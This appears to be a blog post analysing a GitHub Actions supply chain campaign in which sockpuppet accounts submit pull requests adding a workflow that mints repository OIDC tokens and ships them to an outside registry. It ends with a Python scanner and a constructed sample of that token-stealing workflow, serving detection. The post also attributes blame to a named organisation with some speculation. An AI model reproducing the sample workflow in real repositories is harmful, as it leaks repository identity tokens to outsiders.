Everyone figured MCP repos — those buzzing hubs for AI agents and browser automation — were the safe playground for the next platform shift. Developers merging PRs left and right, building agent armies without a second thought. AI’s golden age, right? Tools like Charlotte making automation feel like magic.
But bam. This GitHub Actions supply chain attack flips the script. It’s not some lone hacker; it’s an orchestrated symphony across 250+ repositories, 64 sockpuppet accounts, five escalating phases. All funneled through one shadowy org. Suddenly, that ‘fundamental platform shift’ feels a tad precarious.
Look, a single PR to Charlotte: 28 lines, one workflow file named hol-skill-validate.yml. Quotes the README, offers to tweak the name. Harmless?
I mean, come on — who doesn’t love free CI validation?
What the Hell Is in That Workflow?
Here’s the venom: it demands id-token: write permissions. That’s minting OIDC tokens, those signed JWTs yelling, “Hey cloud, this is legit from repo X!” Fine for deployments. Absurd for ‘skill metadata validation.’
And it calls hashgraph-online/skill-publish@1c30734416d9b05948ccd7f4b3cf60baada87e9e. That action grabs your token, ships it to hol.org/registry/api/v1. Preview-upload? Defaults true. Merge it, and every push, every PR? Your repo’s identity beamed to strangers.
“The entrypoint calls getGithubOidcToken(), mints a token scoped to your repository, and passes it to uploadSkillPreviewFromGithubOidc(), which ships it to hol.org/registry/api/v1.”
No SKILL.md in Charlotte. Nothing to validate. Red flag parade.
The author? internet-dot. Created April 14, 2025. Dormant 11 months, then explodes in late March 2026. 1,599 repos, bio: “i’m just a small dot on the internet. infra and identity. open source.” Links to hol.org — Hashgraph Online, Hedera blockchain crew.
This isn’t a fanboy. It’s their op account. Merged PRs into their own repos first: standards-agent-kit, skill-publish. Built trust.
Phase by Phase: The Attack Unfolds Like a Trojan Parade
Phase 1: Infiltrate awesome-lists. 20+ PRs to awesome-ai-agents, awesome-web3, even awesome-software-supply-chain-security. Slip Hashgraph Online links in. No code. Pure name-dropping where devs hunt tools.
Detour: Bounty farming. Tiny fixes to obscure repos — ScrollView tweaks, blur validation. Profile polish: active contributor, not bot.
Escalation phase. 40+ PRs in two days: codex-plugin.json manifests into MCP heavyweights. github/github-mcp-server. microsoft/playwright-mcp. cloudflare/mcp-server-cloudflare. Hashicorp, Kubernetes, Sentry, Firecrawl, Notion. Foot in the door — metadata files, no workflows yet.
Then it ramps. Sockpuppets swarm. PRs with the killer workflow. Targeting MCP infra: exa-labs, tavily-ai, more.
internet-dot leads, but 64 accounts follow. All HOL-tied. Gists? HOL docs only. UAID specs, MCP guides.
By phase 5: Charlotte-style hits on stragglers. Workflow deploys. Tokens exfiltrated.
Scale? 250+ repos touched. That’s not a poke; it’s a siege on AI agent tooling.
And here’s my unique spin — this echoes the XZ Utils saga, but turbocharged for AI’s agent era. Remember that near-backdoor in a core Linux utils lib? One maintainer compromised over years. Here? Blockchain org weaponizes open source niceties in weeks. Prediction: if unchecked, supply chain hits like this will birth ‘agent firewalls’ — mandatory workflow scanners in every org. AI’s shift demands it.
HOL’s PR spin? “Contributing to open source.” Please. President’s the sole public member. Sockpuppets don’t lie.
But — wild thought — is Hashgraph Online the villain, or pawn? Hedera ecosystem’s quiet. Smells like deeper blockchain turf war spilling into dev tools.
How Did They Dodge Detection?
Sneaky as a fox in a henhouse. Start with legit-ish contribs to own repos. Profile glow-up via bounties. Target lists devs trust: awesomes, MCP directories.
Manifests first — static, low risk. Then workflows with innocent names: ‘skill validate.’ Permissions scoped minimal at first glance.
Sockpuppets scatter: diverse bios, timed bursts. Two-week window. Dormant phases.
Search string: that action hash 1c30734416d9b05948ccd7f4b3cf60baada87e9e. Hunt your repos now.
Energy here — AI agents were set to swarm browsers, clouds, everything. This? A reality check. Wonder turns wary.
Why Does This Matter for AI Builders?
MCP’s exploding: servers bridging LLMs to tools. Playwright, Elasticsearch, Terraform — all agent fuel. Compromise these? Attackers wield your infra.
OIDC tokens? Gold for lateral moves. Impersonate your repo in AWS, GCP. Deploy malware. Escalate.
Bold call: this accelerates security in AI dev. Expect GitHub to tighten OIDC defaults. Repos mandating PR reviews on workflows. Tools like Dependabot on steroids for actions.
It’s the cost of the shift. Like web2’s OAuth scares birthed better auth. AI agents forge tamper-proof pipelines.
Don’t panic-merge. Review. Revoke.
Frequently Asked Questions
What is a GitHub Actions supply chain attack?
It’s when bad actors sneak malicious workflows via PRs, granting them run perms to steal tokens or run code across your repos.
How do I check if my repo has this malware?
Search for action hash 1c30734416d9b05948ccd7f4b3cf60baada87e9e or hol-skill-validate.yml. Audit workflows for id-token: write.
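An added example, mine rather than the post’s or Hashgraph Online’s code, covering both this answer and the “Search string” tip above: a stdlib-only Python scanner that walks .github/workflows and flags any use of hashgraph-online/skill-publish, the pinned hash, and id-token: write. The sample workflow is constructed from the post’s description of the PR, not the real file.

```python
import os
import re

# Indicators the write-up gives for the hol-skill-validate.yml workflow.
SUSPECT_ACTION = "hashgraph-online/skill-publish"
SUSPECT_SHA = "1c30734416d9b05948ccd7f4b3cf60baada87e9e"
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""", re.MULTILINE)
ID_TOKEN_RE = re.compile(r"^\s*id-token:\s*write\b", re.MULTILINE)

def scan_workflow(text):
    """Line-based scan of one workflow's YAML text (no PyYAML needed)."""
    actions = USES_RE.findall(text)
    hits = [a for a in actions if a.split("@", 1)[0] == SUSPECT_ACTION]
    return {
        "id_token_write": bool(ID_TOKEN_RE.search(text)),
        "suspect_action": hits,
        "known_sha": any(a.endswith("@" + SUSPECT_SHA) for a in hits),
    }

def risk(findings):
    if findings["suspect_action"]:
        return "critical"   # the action that ships the OIDC token off-repo
    if findings["id_token_write"]:
        return "review"     # fine for deploys, absurd for metadata validation
    return "clean"

def scan_repo(root):
    """Scan every workflow under <root>/.github/workflows; returns [(name, risk)]."""
    wf_dir = os.path.join(root, ".github", "workflows")
    out = []
    for name in (sorted(os.listdir(wf_dir)) if os.path.isdir(wf_dir) else []):
        if name.endswith((".yml", ".yaml")):
            with open(os.path.join(wf_dir, name), encoding="utf-8") as fh:
                out.append((name, risk(scan_workflow(fh.read()))))
    return out

# Constructed sample modelled on the PR described in the post; not the real file.
SAMPLE_BAD = """name: Validate skill
on: [push, pull_request]
permissions:
  contents: read
  id-token: write
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: hashgraph-online/skill-publish@1c30734416d9b05948ccd7f4b3cf60baada87e9e
"""
```

Run `scan_repo(".")` from a checkout; anything rated critical should be reverted and its OIDC trust relationships in AWS/GCP reviewed.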
Is Hashgraph Online behind the attack?
Evidence points to their org and accounts, but it’s a coordinated op using their tools. Check their repos too.